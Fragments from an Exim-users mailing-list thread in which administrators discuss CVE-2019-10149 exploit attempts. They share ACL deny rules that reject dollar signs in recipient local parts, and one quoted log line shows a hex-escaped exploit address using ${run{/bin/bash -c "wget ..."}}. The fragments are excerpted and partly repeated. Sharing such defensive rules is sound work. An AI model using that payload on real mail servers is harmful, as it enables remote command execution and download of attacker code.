Am 23.06.19 um 21:02 schrieb Jeremy Harris via Exim-users:
> deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
> message = no mate
>
> Thie is perhaps over-broad - a dollar sign in a local-part
> is strictly legitimate per the standards. However, it's
> not something most strictly-As
Am 23.06.19 um 21:02 schrieb Jeremy Harris via Exim-users:
>
> deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
> message = no mate
>
> Thie is perhaps over-broad - a dollar sign in a local-part
> is strictly legitimate per the standards. However, it's
> not something most strictly-
Best I have so far is adding '$' to the the trailing case in the Debian
default list of bad chars in local parts of local addresses:
CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$
which gets used here:
deny
domains = +local_domains
local_parts = CHECK_RCPT_LOCAL_LOCALP
On Sun, Jun 23, 2019 at 07:37:37PM +0200, Heiko Schlittermann via Exim-users
wrote:
> It *seems* that the attackers test for the Exim version in the SMTP
> banner. In servers having 4.92 I do not see as many attempts as on
> 4.87->4.91. But there may be other things influencing this.
I have 4 ex
or, indeed just \$ within the []:
CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[\$@%!/|`#&?]
and I've belatedly noticed that this has already been posted by Marius,
sorry!
Apologies for the noise.
cheers,
calum.
On 23/06/2019 7:57 pm, Calum Mackay wrote:
Best I have so far is adding '$' to the t
On 23/06/2019 18:51, Calum Mackay via Exim-users wrote:
> by any chance, please, would anyone happen to have an acl_smtp_rcpt
> example that catches these particular exploit attempts — so my queue
> doesn't fill up with these frozen msgs — /but/ still allows me to have
> "user+suffix@domain" which
On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:
CVE-2019-10149 is not that it is possible to submit a mail that ends
up frozen in the queue. CVE is a remote command execution
vulnerabilty. The fix for CVE-2019-10149 does not remove the
possibility to generate frozen mails in the queu
Hello,
Thomas Hager via Exim-users (Fr 21 Jun 2019 21:26:11
CEST):
> > 2019-06-20 15:13:33 Received from <> H=(.de)
> > [89.248.171.57] P=smtp S=1114
> > 2019-06-20 15:13:33 routing failed for
> > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
> > k\x2dcertificate\x20\x2dT
